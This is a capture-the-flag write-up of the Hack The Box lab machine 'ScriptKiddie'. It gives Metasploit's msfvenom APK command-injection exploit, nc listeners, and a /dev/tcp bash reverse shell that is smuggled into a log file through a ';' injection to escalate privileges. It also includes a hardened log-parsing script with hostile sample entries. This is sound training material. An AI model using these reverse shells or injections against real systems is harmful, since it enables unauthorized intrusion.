Hack The Box writeup - ScriptKiddie

Today we will solve ScriptKiddie, an easy box from Hack The Box (HTB). For those who don't know, HTB is a practice platform for learning penetration testing.

Box Details

Box Name: ScriptKiddie
OS: Linux
Difficulty: Easy
IP: 10.10.10.226
Points: 20

Summary

  1. Connect to the HTB VPN.
  2. Start the ScriptKiddie box from the HTB portal and ping the machine IP.
  3. Start with Nmap. Found two ports 22 and 5555 open.
  4. Browse http://10.10.10.226:5000.
  5. Found msfvenom functionality on the webpage.
  6. Search Google for an msfvenom exploit.
  7. Found an exploit.
  8. Use msfconsole to generate msf.apk.
  9. Upload it on the web page and set up a listener.
  10. Got user kid.
  11. Check scanlosers.sh.
  12. Rewrite the hackers file and get a pwn shell.
  13. Check sudo permissions in the pwn shell.
  14. Use sudo to become root and find the root flag.

Start with Nmap

Basic Scan

nmap 10.10.10.226

Run the default scripts (-sC) and version enumeration (-sV) against the target.

nmap -sC -sV 10.10.10.226

Scan all ports once by using the -p- option. This step ensures that every open port is covered.

nmap -p- 10.10.10.226

UDP scan

You can use the command below for a UDP scan, although I did not find anything.

nmap -sU -p- 10.10.10.226

Check in Web Browser

Browse http://10.10.10.226:5000

Play with the webpage. Just type an IP to see the response.

The webpage (payloads) shows functionality similar to the msfvenom tool. I searched for an msfvenom exploit that might help me get a user shell.

Found "Rapid7 Metasploit Framework msfvenom APK Template Command Injection".

Read the description. As it mentions, this vulnerability allows command injection. Using msfconsole, we will create an apk file to upload to the web tool.

Open Metasploit on the Kali machine. Now we will create the apk file by using msfconsole.

msfconsole

Search for the exploit by typing the command below.

search msfvenom

Found the exploit. To create the apk file, use the commands below to select the module and then display its options.

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

show options

Use the ifconfig command to find your IP and set it as lhost. For lport you can use 1111.

set lhost 10.10.14.2

set lport 1111

set rhost 10.10.10.226

set rport 5555

The apk file is now generated by msfconsole. As shown in the terminal, msf.apk is stored at /home/kali/.msf4/local/msf.apk. On the web page, select android as the os and enter the IP of your Kali system as lhost. Locate msf.apk and click on generate, but set up a listener with the nc -lvnp 1111 command before clicking on generate.

Got a reverse shell on nc. You can confirm the user by using the id and ifconfig commands.

id

ifconfig

Get an interactive shell by using the command below.

python3 -c 'import pty; pty.spawn("/bin/sh")'

Now navigate around and use the commands below to learn more about the remote system. Use pwd to print the present working directory, cd to change directory, ls -l to list files and wc to get the word count of the user.txt file.

pwd

cd ..

ls -l

wc user.txt

Privilege Escalation

Notice two user accounts, kid and pwn, and their two directories, kid and pwn. The pwn one seems interesting.

Browse the pwn directory. List its contents by using the ls -l command.

ls -l

cat scanlosers.sh

The script reads its log file from /home/kid/logs/hackers. Remember that the cut command drops the first two fields.

Check the file's permissions by using the ls -l command.

Use the commands below.

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/2222 0>&1' #" >> hackers

nc -lvnp 2222

Got a shell as user pwn. Now get an interactive shell.

python3 -c 'import pty; pty.spawn("/bin/sh")'
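
The step above works because text from a log that kid can append to ends up on a command line run by pwn. A hardened form of that log-processing pattern, as an added example and not the box's scanlosers.sh: the log format, the function names, the SCAN_CMD hook and the nmap option are assumptions.

```sh
# Added example, not the box's script: validate log-derived values before use.
# Assumption: each log line is "<field1> <field2> <ip>", split on single spaces.

# Succeed only for a dotted-quad IPv4 address with every octet in 0..255.
# The body runs in a subshell so the IFS change cannot leak to the caller.
is_ipv4() (
    case $1 in
        ''|*[!0-9.]*|*.) return 1 ;;   # digits and dots only, no trailing dot
    esac
    IFS=.
    set -- $1
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in ''|????*) return 1 ;; esac   # 1 to 3 digits
        [ "$octet" -le 255 ] || return 1
    done
)

# Read log lines on stdin, drop the first two fields with cut, and print
# only the unique values that are valid IPv4. Rejects go to stderr.
extract_targets() {
    while IFS= read -r line; do
        field=$(printf '%s\n' "$line" | cut -d' ' -f3-)
        if is_ipv4 "$field"; then
            printf '%s\n' "$field"
        else
            printf 'rejected log entry: %s\n' "$field" >&2
        fi
    done | sort -u
}

# Pass each value as one argument, never through sh -c. SCAN_CMD is a hypothetical dry-run hook.
scan_targets() {
    while IFS= read -r ip; do
        "${SCAN_CMD:-nmap}" --top-ports 10 "$ip"
    done
}

# Constructed sample log: one repeated address and two hostile entries.
sample_log() {
    cat <<'EOF'
[2021-02-06 12:00:01] 10.10.14.2
[2021-02-06 12:00:02] 10.10.14.2
[2021-02-06 12:00:03] 10.10.14.7;id #
[2021-02-06 12:00:04] 999.1.1.1
EOF
}
sample_log | extract_targets | SCAN_CMD=echo scan_targets   # dry run
```

The dry run prints one scanner command line for 10.10.14.2 and reports the two rejected entries on stderr.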

Check sudo permissions. Found that msfconsole is allowed via sudo without a password.

sudo -l

Run msfconsole with sudo.

sudo msfconsole

Check id

Found root.txt file.

Disclaimer: This tutorial is for educational purposes only. Each individual is solely responsible for any illegal act.